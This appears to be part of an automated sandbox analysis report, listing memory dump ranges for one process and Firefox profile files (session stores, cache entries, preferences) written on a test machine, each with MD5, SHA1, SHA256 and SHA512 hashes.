memory/2664-487-0x00007FFED0FF0000-0x00007FFED10A7000-memory.dmp
memory/2664-486-0x00007FFEE3D80000-0x00007FFEE3D8D000-memory.dmp
memory/2664-485-0x00007FFEDF510000-0x00007FFEDF53E000-memory.dmp
memory/2664-484-0x00007FFEDFC80000-0x00007FFEDFC99000-memory.dmp
memory/2664-483-0x00007FFEDF8A0000-0x00007FFEDFA11000-memory.dmp
memory/2664-482-0x00007FFEDFE80000-0x00007FFEDFE9E000-memory.dmp
memory/2664-481-0x00007FFEE01E0000-0x00007FFEE01F8000-memory.dmp
memory/2664-480-0x00007FFEDFEA0000-0x00007FFEDFECC000-memory.dmp
memory/2664-479-0x00007FFEE4EE0000-0x00007FFEE4F04000-memory.dmp
memory/2664-478-0x00007FFEE4DD0000-0x00007FFEE4DDF000-memory.dmp
memory/2664-477-0x00007FFEDFD00000-0x00007FFEDFD0D000-memory.dmp
memory/2664-476-0x00007FFED1340000-0x00007FFED1458000-memory.dmp
memory/2664-462-0x00007FFED1460000-0x00007FFED18C5000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | a40e0011746d76d36f068e5d030dc68e |
| SHA1 | 5976cf34f1667a66381e23465881e5305b83e769 |
| SHA256 | 299ce4ed1961c7795b9180d6149a355f1409e113c65617f7522b7c1eaec85c3b |
| SHA512 | b4129e117d350209d6e4e9090945d17fd883d27e008a1f1b16bb2f181a63afbfee86fcf3c7bd1075e6c36bda8dc20a49b082992eed719030521b8814841c2a25 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\cache2\entries\4B1F09000B64F09F2E43F1852A2051FF069F4083
| MD5 | 119067badabd70a92a8ff348145627db |
| SHA1 | 8b2e7014afc3347738e233a9ed6faf52c52eea59 |
| SHA256 | 2503ec3a432795d3e0f09d3db209a66ea80e0bef98126cc3f105bde1efdbb5e1 |
| SHA512 | 2f70a7da0c00fd540a789210abcbd59992f0c46584294258d78f60bf93475eeb62f98dcee9a4da84803e1ac98a536ccbe4c7efa7f838175d080fcae06ab66548 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\cache2\doomed\8167
| MD5 | ff547d9ece7e8765b727bd70d5dcf082 |
| SHA1 | 9197f296e739f0268e470c60624f67332222a7db |
| SHA256 | c3df104471ec628adaae1f3064fdc8f996db5e804aad716b1d53a4a697f73977 |
| SHA512 | 5761f969f23ffe9e2bfd86c19c617b4484556e9a7daa1601db6adffec15ca349f620f2912031ddae3c0ed7893a6dc11e9247104820bef5ffdb780185f720b7ec |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\cache2\doomed\10658
| MD5 | 3258af6a4f2131627bbe1c51f565c95f |
| SHA1 | 9131307e5f4084cfbf87e0099972ae1789186d70 |
| SHA256 | 48729a002ab294ed733acadbf577a4209d2a0379b105362a690f12cc4a84d750 |
| SHA512 | cb0301405a06c64a6339b96ae5527f20b69a2da62060b957a1a892acbbd9532660b8104477d909eb03b9f10d2c31ed93172eb72b57da3d491887d8f8f07e7662 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\cache2\entries\E4215D13DC0A46D42A40208857C1B23A943B3A95
| MD5 | 267abf9cb6259040a5d27881fc77c3b0 |
| SHA1 | b146206b36f9515abf745311ed8d05a0681a998b |
| SHA256 | d55546faca13c562fd3d0903ede69656d0e3bcb39455e404fae00ce0485c6c01 |
| SHA512 | 0416b0ef1e19b3908f0dae94d990187d209b8f8ac32507b71033f6176ffb1c344910567d2088b5d851f62bb63f82d2edd9bda9c0bcca468adb921fa11df69efd |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\cache2\doomed\1322
| MD5 | 83854401893ad354be48b03bab41bb06 |
| SHA1 | dbbbc08fccaa8bb08ab203c1a52fd9f1080b5d79 |
| SHA256 | 0d06282d2fe7b98c644f85fc0040164fab587e411789ef5f8881005443f785cf |
| SHA512 | 322a7ef649c2d4a15edc3f360746f800623e9a69394a8eb5eb1730b9dc88f403a0952c0cbd0698642970cd4f403b24c6033c154781c1fb61cc27d243f2672942 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\prefs-1.js
| MD5 | 28f4695156f66a45f6b9abd95d43b47d |
| SHA1 | 250ed4848ba3343506880c6fa3a410e4b8043f4f |
| SHA256 | 7ce36233660ec010a839f785fea84d219f5f68b98ba8e15871335bb2e735e0d9 |
| SHA512 | 6cee634b473588d3dca16bcecb1b01e2c9fb11bcacc4717d7ed5d5072f2c86873e654e4341159075d8eab9260b5ad97eb171581f69e0a90287409f6269041ea6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore.jsonlz4
| MD5 | 121a97fdf7e1b45f5a70ca5e4dabceeb |
| SHA1 | c147b24e0dfb2b33b4a9b7f4f9f60d92cfaa7ac2 |
| SHA256 | 5b997de57753b64b088543cbbc81c1515990c65813b22ef8da3bc6d40d15cc4b |
| SHA512 | d12166c5b92a4b4daa71d09f19a6d8ebead0481bfa1b578d489137a99e5b8b3866ed97320964f8e4e2991d3cddcb78154cc96f3458a28f5f51ba48cfc3a85157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionCheckpoints.json.tmp
| MD5 | ea8b62857dfdbd3d0be7d7e4a954ec9a |
| SHA1 | b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a |
| SHA256 | 792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da |
| SHA512 | 076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionCheckpoints.json.tmp
| MD5 | c4ab2ee59ca41b6d6a6ea911f35bdc00 |
| SHA1 | 5942cd6505fc8a9daba403b082067e1cdefdfbc4 |
| SHA256 | 00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2 |
| SHA512 | 71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 6b59453e29dbd5949754b1166ea09e52 |
| SHA1 | 58e6ffe90d87e7ec96fd00d7e2d56cf8bf396b80 |
| SHA256 | 67800a30bb6c13bbf497677d76eab1901c77977b596852edba40b6f0405bb04b |
| SHA512 | 4bf3bfc67c1e8ae084663d073f674ca87febcf268bcbd0a3c69057210d2452e75fdb0808cea3a6ec0538ad45f801e786ac012643e303bbb3035d97253873851b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\prefs.js
| MD5 | a0817d2781c164311419326d16a70514 |
| SHA1 | 390add6524331331a59e0fae127a00f89bbaab77 |
| SHA256 | 39a0f31e681399c6bbb464960c4196cdbb2a8ccbaa10991c579f0a70c1200c5d |
| SHA512 | 53a0a7251113d3fcd96354258cacf477c63ece0be09cd3a533c65c8ef581dae690e7ccc96c93ce5f559291737e113d0c3c04f767166b8361dac4d6b19c44060c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\prefs-1.js
| MD5 | a1d2fd508af81843b236a47aee91e13c |
| SHA1 | 79bb224065205c55a6a0076b9a0f0431799b09b4 |
| SHA256 | 058c289b86947dc4f70b011c8cd9a69fe5737088800b6d0e7dd75df63349a46b |
| SHA512 | cf9324a8de62b606b68072a4455b0edebf59d72899e2e531581a87e54152ef066a03774ee062dfd326a8a4beb42eb8538417ab698016ea4a8deb1f26e2b015be |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 15c0c148e33972f614596e82fa3f0152 |
| SHA1 | 756a5bb1ab5cc7c65478c77ab0a142a3ef775183 |
| SHA256 | 3cc5ef561b90220f5e0f4101b2da07694b3bd6fa248532b56bb9ba47eb7733d8 |
| SHA512 | 306de5b984fddadb90a5ce2138dc4919c32d49cf486a0b24cd3d928c952c923b6c8153f4659c32eef8bc06cf0d529cc86de31e302b79742c40b453bb5792ed2a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 34863f7d94ee53ddb1f89286a32d824a |
| SHA1 | 443265a0ddfd712b9c10dbf8a214a3574e578d9f |
| SHA256 | 14df88ae0008a4e349fb8d17c58212d58d8fa0c68ba3cb937a0e8abc9933d28b |
| SHA512 | 80828732fad168daaebd7fb4a093a1646e8dd474f863ff33677a787f94078755dfb0558633e0d2c0d7801f0eee278690773afeaff792ba0cde5650181aee2e55 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 000e41a7239f03e34e262e3ecb2999e1 |
| SHA1 | 1788505854101bb5ff53e78316147c088ba342e2 |
| SHA256 | 93b7456dc8f5fb68f61dda3a821aa36d7da9e16c2639d68b8124a9d5d8452e79 |
| SHA512 | 0abaa2127d920ac721c8546794deaa3b4430b4012374acb67e1b5f9d2f5b26495cb440a199036b4c628de8cd43a51c5dd3accf521d32d9333ad3cc797a526a9e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | c760b4b24833848a7bb57d435b6a91c9 |
| SHA1 | 9e7e872e926dd793c7cbd7eea1c74b8657a32b2a |
| SHA256 | b3bf15e41bb189b92b6baaf55a3e47a38f74c5d9c69a5da57f757045936d9c4c |
| SHA512 | 8d8283b9679aeb08b871b1961e127d4fd57339f914cf2bb6ded3a43768dd3395cbfae5af556a83db87abd1361bb874508b8c060957c371008606fdc40050b2e2 |